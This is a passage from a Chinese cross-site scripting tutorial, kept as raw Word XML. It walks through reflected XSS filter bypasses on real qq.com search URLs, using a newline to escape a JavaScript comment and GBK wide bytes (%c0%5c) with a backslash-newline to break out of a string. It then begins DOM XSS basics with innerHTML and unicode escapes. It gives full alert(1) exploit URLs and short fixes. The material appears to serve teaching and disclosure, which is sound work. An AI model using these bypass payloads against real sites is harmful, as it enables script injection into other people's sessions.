          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>某些情况下，\</w:t>
      </w:r>
      <w:r w:rsidR="00ED164C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>还是很危险的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD7C61" w:rsidRPr="009C207F" w:rsidRDefault="00FD7C61" w:rsidP="00FD7C61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4E0A33" w:rsidRPr="009A6E70" w:rsidRDefault="004E0A33" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第六节换行符复仇记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4E0A33" w:rsidRPr="009C207F" w:rsidRDefault="004E0A33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还是在&lt;script&gt;之间的场景，某些情况下，我们仅仅需要的只是一个换行符，就可以绕过过滤了。它让双引号，尖括号知道了“它们不是一个符号在战斗”。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4E0A33" w:rsidRPr="009C207F" w:rsidRDefault="003B0F6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ED164C" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实际场景是下面这个例子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tp://datalib.games.qq.com/cgi-bin/search?libid=178&amp;FilterAttrAND=3602&amp;FilterValueAND=aaaaaaaaaa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对应的，我们可以看到我们的输入aaaaaaaaa会在页面的哪些输出点出现呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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129C046" wp14:editId="19C23817">
            <wp:extent cx="5715000" cy="3181350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="图片 21" descr="22.jp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.jpg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20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4E0A33" w:rsidRPr="009C207F" w:rsidRDefault="003B0F6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2.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不错，一共有5处，有在HTML标签之间的（教程1），也有在&lt;script&gt;.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/script&gt;之间的。但是呢，该过滤的，&lt;,&gt;过滤掉了，该过滤的"</w:t>
      </w:r>
      <w:r w:rsidR="00C77583" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也过滤掉了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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4AEE8B18" wp14:editId="3C5AEF29">
            <wp:extent cx="5715000" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="23.jpg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.jpg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21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4E0A33" w:rsidRPr="009C207F" w:rsidRDefault="003B0F6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3.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是说传统的已经不行啦，我们继续看5处的其他地方。呀，竟然还有一大段注释里，也出现了我们的【输出】</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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0795D0C3" wp14:editId="19768CA7">
            <wp:extent cx="5715000" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="图片 23" descr="24.jp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jp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22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4E0A33" w:rsidRPr="009C207F" w:rsidRDefault="003B0F6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lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>嗯，这样一来，是否会想到这样一个用法呢？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//我是注释，我爱洗澡，哦～哦～哦～[我是输出]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A33" w:rsidRPr="009C207F" w:rsidRDefault="00C7758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果可以使用换行符的话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//我是注释，我爱洗澡，哦～哦～哦～[我是输出换行符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alert(1);//我是输出]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样alert(1);</w:t>
      </w:r>
      <w:r w:rsidR="00C77583" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就会被成功执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A33" w:rsidRPr="009C207F" w:rsidRDefault="003B0F6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5.</w:t>
      </w:r>
      <w:r w:rsidR="00C77583" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恩，带着这样一个想法，我们不难构造出以下利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A33" w:rsidRPr="009C207F" w:rsidRDefault="004E0A33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tp://datalib.games.qq.com/cgi-bin/search?libid=178&amp;FilterAttrAND=3602&amp;FilterValueAND=%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0aalert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1);//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A33" w:rsidRPr="009C207F" w:rsidRDefault="00C7758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看下输出</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>嘿，果然没过滤</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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3FEA4E7" wp14:editId="0B0921A4">
            <wp:extent cx="5715000" cy="3362325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="24" name="图片 24" descr="25.jpg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.jpg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2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4E0A33" w:rsidRPr="009C207F" w:rsidRDefault="003B0F6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6.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样，这一次我们的换行符立功了，它不是一个符号在战斗！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A33" w:rsidRPr="009C207F" w:rsidRDefault="003B0F6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7.</w:t>
      </w:r>
      <w:r w:rsidR="004E0A33" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0A33" w:rsidRPr="009C207F" w:rsidRDefault="004E0A3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尽量不要在JS的注释里输出内容。还挺危险的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00932885" w:rsidRPr="009C207F" w:rsidRDefault="00932885" w:rsidP="00932885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4E0A33" w:rsidRPr="009A6E70" w:rsidRDefault="00F23B78" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6E70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第七节宽字节、反斜线与换行符一起复仇记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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F23B78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F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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262143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F23B78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一次，3个家伙一起上啦～</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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F23B78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F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实例点如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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http://cgi.data.tech.qq.com/index.php?mod=search&amp;type=data&amp;site=digi&amp;libid=2&amp;curpage=1&amp;pagenum=30&amp;filterattr=138,138|16|4,5,4,5&amp;filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&amp;tplname=centersearch.shtml&amp;orderby=aaaaaaaaaaaa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00C7758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老规矩，继续看我们的输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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85C3D75" wp14:editId="05AEAA24">
            <wp:extent cx="5715000" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="27.jpg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.jpg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8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24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0C6FFB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2.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一共有3处输出，位于HTML属性里的那一处，我们放弃了，因为双引号被灭掉了。那么还剩下2处。都是位于&lt;script&gt;.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00C77583" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里，而且挨在了一起</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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3.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>先看第2处，是不是似曾相似啊？对的，教程6里刚刚遇到过。那就是输出在【注释】的情况。我们用换行符试试？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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8C1EB7E" wp14:editId="6273EE07">
            <wp:extent cx="5715000" cy="2428875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="27" name="图片 27" descr="28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8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25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0C6FFB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4.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一条是好消息，换行可以用，一条是坏消息。。下面出现的一句坏了我们的好事。。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>肿么办</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个时候，我们需要先说点javascript</w:t>
      </w:r>
      <w:r w:rsidR="00C77583" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的知识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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javascript</w:t>
      </w:r>
      <w:r w:rsidR="00C77583" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，字符串允许下面多行的写法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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vara="我是一个字符串\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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还是一个字符串";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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6.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基于这点，我们可以把缺陷点构造成下面的样子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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//</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>document.getElementById(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"order_select").value="aaaa\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1);//";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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varsearchOrder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>="aaaa\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1);//";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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么代码构造的解析如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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47F77A9" wp14:editId="791E3E32">
            <wp:extent cx="5715000" cy="1514475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="28" name="图片 28" descr="29.jp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9.jp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8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26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F23B78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7.</w:t>
      </w:r>
      <w:r w:rsidR="001E5217" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>带着这个想法，请上我们的反斜线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE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8450006" wp14:editId="2A1EA366">
            <wp:extent cx="5715000" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="图片 29" descr="30.jpg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0.jpg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8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27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F23B78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8.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>悲剧的是，反斜线被过滤成了2个\\，这下不好办了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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9.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>还记得在教程4里，我们提到的宽字节用法么？说到了%c0可以吃掉%5c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00E02FA0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看看页面的编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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&lt;metahttp-equiv="Content-Type"content="text/html</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;charset</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=gb2312"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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gbxxx</w:t>
      </w:r>
      <w:r w:rsidR="00E02FA0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系列的啊，窃喜中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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0.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>于是，我们的%c0也加</w:t>
      </w:r>
      <w:r w:rsidR="00E02FA0" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>入战斗了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78" w:rsidP="009C2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http://cgi.data.tech.qq.com/index.php?mod=search&amp;type=data&amp;site=digi&amp;libid=2&amp;curpage=1&amp;pagenum=30&amp;filterattr=138,138|16|4,5,4,5&amp;filtervalue=3500-4000,%B4%F3%D3%DA4000|%D0%FD%D7%AA|WCDMA,WCDMA,HSDPA,HSDPA&amp;tplname=centersearch.shtml&amp;orderby=aaaa%c0%5c%0aalert(1);//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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看看源码中的输出。\\被我们变成了乱码+\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E060FE" w:rsidRPr="009C207F" w:rsidRDefault="00F23B78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46F42E3" wp14:editId="6B65FF90">
            <wp:extent cx="5715000" cy="2247900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="图片 30" descr="31.jpg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1.jpg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8" w:rsidRPr="009C207F" w:rsidRDefault="00E060FE" w:rsidP="006D01AD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28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0C6FFB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1.</w:t>
      </w:r>
      <w:r w:rsidR="00C77583" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最后弹窗，见漏洞证明</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78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2.</w:t>
      </w:r>
      <w:r w:rsidR="00F23B78" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此时，标点符号们正在开会，开会的主题是：“大家好，才是真的好”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E037D" w:rsidRPr="009C207F" w:rsidRDefault="001019E3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3.</w:t>
      </w:r>
      <w:r w:rsidR="005E037D" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23B78" w:rsidRPr="009C207F" w:rsidRDefault="005E037D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参加前面教程4，5，6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84DCF" w:rsidRPr="009C207F" w:rsidRDefault="00D84DCF" w:rsidP="00D84DC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C10976" w:rsidRPr="009C207F" w:rsidRDefault="00C10976" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第八节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOMXSS[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示输出</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p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C10976" w:rsidRPr="009C207F" w:rsidRDefault="00C10976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简要描述：</w:t>
      </w:r>
    </w:p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反射型XSS部分，就到这里了。接着我们进入DomXss的部分。DomXss相比反射型XSS，脑袋需要多思考一层。也就是说，我们关注的不仅是【输出】了什么，还要了解这个页面里，【javascript】拿这个【输出】干了什么。为了循序渐进，本例讲到的是，【输出】直接在源代码可见的情况。</w:t>
      </w:r>
    </w:p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详细说明：</w:t>
      </w:r>
    </w:p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在学习DomXss之前，先来补习点html,js的基础知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976" w:rsidRPr="009C207F" w:rsidTr="00C10976">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00C10976" w:rsidRPr="009C207F" w:rsidRDefault="00C10976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divid="a"&gt;xxx&lt;/div&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10976" w:rsidRPr="009C207F" w:rsidRDefault="00C10976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&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10976" w:rsidRPr="009C207F" w:rsidRDefault="00C10976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document.getElementById("a").innerHTML="yyyyyy";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C10976" w:rsidRPr="009C207F" w:rsidRDefault="00C10976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/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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解释如下：</w:t>
      </w:r>
    </w:p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30A3651" wp14:editId="79D296C4">
            <wp:extent cx="5274310" cy="1318578"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="33.jpg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.jpg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76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29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5440EB" w:rsidRPr="009C207F" w:rsidRDefault="005440EB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2.</w:t>
      </w:r>
      <w:r w:rsidR="00C10976" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进一步，我们的yyyyyy，还可以是HTML代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5440EB" w:rsidRPr="009C207F" w:rsidTr="005440EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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divid="a"&gt;xxx&lt;/div&gt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&gt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document.getElementById("a").innerHTML="&lt;imgsrc=1&gt;"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/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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效果如下：</w:t>
      </w:r>
    </w:p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EEED923" wp14:editId="4C0CD7D3">
            <wp:extent cx="5715000" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="图片 34" descr="34.jpg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.jpg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76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30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3.再进一步，JS的字符串中的字符可以写为unicode编码。</w:t>
      </w:r>
    </w:p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譬如：&lt;可以表示为\u003c,&gt;可以表示为</w:t>
      </w:r>
      <w:r w:rsidR="005440EB" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\u003e</w:t>
      </w:r>
    </w:p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不知道怎么转义的，可以使用gainover的工具。</w:t>
      </w:r>
    </w:p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工具地址：http://app.baidu.com/app/enter?appid=280383</w:t>
      </w:r>
    </w:p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23C097C4" wp14:editId="2E8AF313">
            <wp:extent cx="5715000" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="33" name="图片 33" descr="35.jpg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.jpg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76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31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也就是，我们上面的代码，可以进一步写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40EB" w:rsidRPr="009C207F" w:rsidTr="005440EB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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lastRenderedPageBreak/>
              <w:t>&lt;divid="a"&gt;xxx&lt;/div&gt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&gt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document.getElementById("a").innerHTML="\u003cimgsrc=1\u003e"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/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005440EB" w:rsidRPr="009C207F" w:rsidRDefault="005440EB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</w:t>
      </w:r>
